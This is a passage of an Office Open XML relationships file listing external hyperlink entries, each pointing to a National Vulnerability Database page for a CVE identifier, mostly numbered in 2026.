Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77641" TargetMode="External" Id="rId1778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77822" TargetMode="External" Id="rId1779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77968" TargetMode="External" Id="rId1780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78491" TargetMode="External" Id="rId1781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79645" TargetMode="External" Id="rId1782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81354" TargetMode="External" Id="rId1783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81356" TargetMode="External" Id="rId1784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81357" TargetMode="External" Id="rId1785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81378" TargetMode="External" Id="rId1786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81379" TargetMode="External" Id="rId1787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82209" TargetMode="External" Id="rId1788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82262" TargetMode="External" Id="rId1789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82263" TargetMode="External" Id="rId1790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82586" TargetMode="External" Id="rId1791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82728" TargetMode="External" Id="rId1792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82753" TargetMode="External" Id="rId1793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82869" TargetMode="External" Id="rId1794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82871" TargetMode="External" Id="rId1795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83939" TargetMode="External" Id="rId1796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84370" TargetMode="External" Id="rId1797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85596" TargetMode="External" Id="rId1798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85597" TargetMode="External" Id="rId1799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85730" TargetMode="External" Id="rId1800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86145" TargetMode="External" Id="rId1801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86251" TargetMode="External" Id="rId1802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86253" TargetMode="External" Id="rId1803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86258" TargetMode="External" Id="rId1804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86297" TargetMode="External" Id="rId1805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86600" TargetMode="External" Id="rId1806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88032" TargetMode="External" Id="rId1807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88897" TargetMode="External" Id="rId1808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89054" TargetMode="External" Id="rId1809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-58375" TargetMode="External" Id="rId1810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-63822" TargetMode="External" Id="rId1811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-9566" TargetMode="External" Id="rId1812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18147" TargetMode="External" Id="rId1813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19219" TargetMode="External" Id="rId1814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19303" TargetMode="External" Id="rId1815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19594" TargetMode="External" Id="rId1816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19693" TargetMode="External" Id="rId1817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19991" TargetMode="External" Id="rId1818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32257" TargetMode="External" Id="rId1819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32258" TargetMode="External" Id="rId1820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33997" TargetMode="External" Id="rId1821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44249" TargetMode="External" Id="rId1822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44745" TargetMode="External" Id="rId1823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4600" TargetMode="External" Id="rId1824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46099" TargetMode="External" Id="rId1825" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47231" TargetMode="External" Id="rId1826" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47297" TargetMode="External" Id="rId1827" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48081" TargetMode="External" Id="rId1828" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50979" TargetMode="External" Id="rId1829" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52521" TargetMode="External" Id="rId1830" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52793" TargetMode="External" Id="rId1831" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53510" TargetMode="External" Id="rId1832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53580" TargetMode="External" Id="rId1833" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54083" TargetMode="External" Id="rId1834" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54330" TargetMode="External" Id="rId1835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55007" TargetMode="External" Id="rId1836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55065" TargetMode="External" Id="rId1837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55228" TargetMode="External" Id="rId1838" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57233" TargetMode="External" Id="rId1839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61641" TargetMode="External" Id="rId1840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61699" TargetMode="External" Id="rId1841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62667" TargetMode="External" Id="rId1842" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64665" TargetMode="External" Id="rId1843" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64679" TargetMode="External" Id="rId1844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65181" TargetMode="External" Id="rId1845" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69325" TargetMode="External" Id="rId1846" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69380" TargetMode="External" Id="rId1847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69438" TargetMode="External" Id="rId1848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69510" TargetMode="External" Id="rId1849" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69524" TargetMode="External" Id="rId1850" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69530" TargetMode="External" Id="rId1851" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69546" TargetMode="External" Id="rId1852" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69620" TargetMode="External" Id="rId1853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69680" TargetMode="External" Id="rId1854" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69732" TargetMode="External" Id="rId1855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69782" TargetMode="External" Id="rId1856" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69786" TargetMode="External" Id="rId1857" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69813" TargetMode="External" Id="rId1858" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69827" TargetMode="External" Id="rId1859" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69858" TargetMode="External" Id="rId1860" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69989" TargetMode="External" Id="rId1861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70342" TargetMode="External" Id="rId1862" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70465" TargetMode="External" Id="rId1863" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70468" TargetMode="External" Id="rId1864" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70482" TargetMode="External" Id="rId1865" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70494" TargetMode="External" Id="rId1866" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70563" TargetMode="External" Id="rId1867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71308" TargetMode="External" Id="rId1868" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71320" TargetMode="External" Id="rId1869" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71407" TargetMode="External" Id="rId1870" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72903" TargetMode="External" Id="rId1871" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72921" TargetMode="External" Id="rId1872" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72936" TargetMode="External" Id="rId1873" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72981" TargetMode="External" Id="rId1874" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72987" TargetMode="External" Id="rId1875" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73223" TargetMode="External" Id="rId1876" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73225" TargetMode="External" Id="rId1877" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73227" TargetMode="External" Id="rId1878" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73286" TargetMode="External" Id="rId1879" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73289" TargetMode="External" Id="rId1880" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73334" TargetMode="External" Id="rId1881" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73659" TargetMode="External" Id="rId1882" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75021" TargetMode="External" Id="rId1883" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75464" TargetMode="External" Id="rId1884" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76009" TargetMode="External" Id="rId1885" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77317" TargetMode="External" Id="rId1886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77505" TargetMode="External" Id="rId1887" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77567" TargetMode="External" Id="rId1888" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78444" TargetMode="External" Id="rId1889" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78449" TargetMode="External" Id="rId1890" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78450" TargetMode="External" Id="rId1891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78583" TargetMode="External" Id="rId1892" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78626" TargetMode="External" Id="rId1893" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78839" TargetMode="External" Id="rId1894" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79678" TargetMode="External" Id="rId1895" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79746" TargetMode="External" Id="rId1896" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80132" TargetMode="External" Id="rId1897" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80354" TargetMode="External" Id="rId1898" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81268" TargetMode="External" Id="rId1899" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81784" TargetMode="External" Id="rId1900" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81801" TargetMode="External" Id="rId1901" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81805" TargetMode="External" Id="rId1902" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81891" TargetMode="External" Id="rId1903" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81892" TargetMode="External" Id="rId1904" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82302" TargetMode="External" Id="rId1905" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82925" TargetMode="External" Id="rId1906" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83527" TargetMode="External" Id="rId1907" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83997" TargetMode="External" Id="rId1908" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84381" TargetMode="External" Id="rId1909" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84393" TargetMode="External" Id="rId1910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84504" TargetMode="External" Id="rId1911" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86242" TargetMode="External" Id="rId1912" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86479" TargetMode="External" Id="rId1913" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87016" TargetMode="External" Id="rId1914" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87036" TargetMode="External" Id="rId1915" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87075" TargetMode="External" Id="rId1916" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87457" TargetMode="External" Id="rId1917" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87467" TargetMode="External" Id="rId1918" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87471" TargetMode="External" Id="rId1919" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87499" TargetMode="External" Id="rId1920" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87505" TargetMode="External" Id="rId1921" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87509" TargetMode="External" Id="rId1922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87514" TargetMode="External" Id="rId1923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87530" TargetMode="External" Id="rId1924" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87533" TargetMode="External" Id="rId1925" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87537" TargetMode="External" Id="rId1926" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87554" TargetMode="External" Id="rId1927" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87606" TargetMode="External" Id="rId1928" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87874" TargetMode="External" Id="rId1929" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87958" TargetMode="External" Id="rId1930" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14873" TargetMode="External" Id="rId1931" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15581" TargetMode="External" Id="rId1932" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28662" TargetMode="External" Id="rId1933" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30826" TargetMode="External" Id="rId1934" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30890" TargetMode="External" Id="rId1935" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-31803" TargetMode="External" Id="rId1936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-31880" TargetMode="External" Id="rId1937" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42807" TargetMode="External" Id="rId1938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45790" TargetMode="External" Id="rId1939" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47858" TargetMode="External" Id="rId1940" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48080" TargetMode="External" Id="rId1941" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49832" 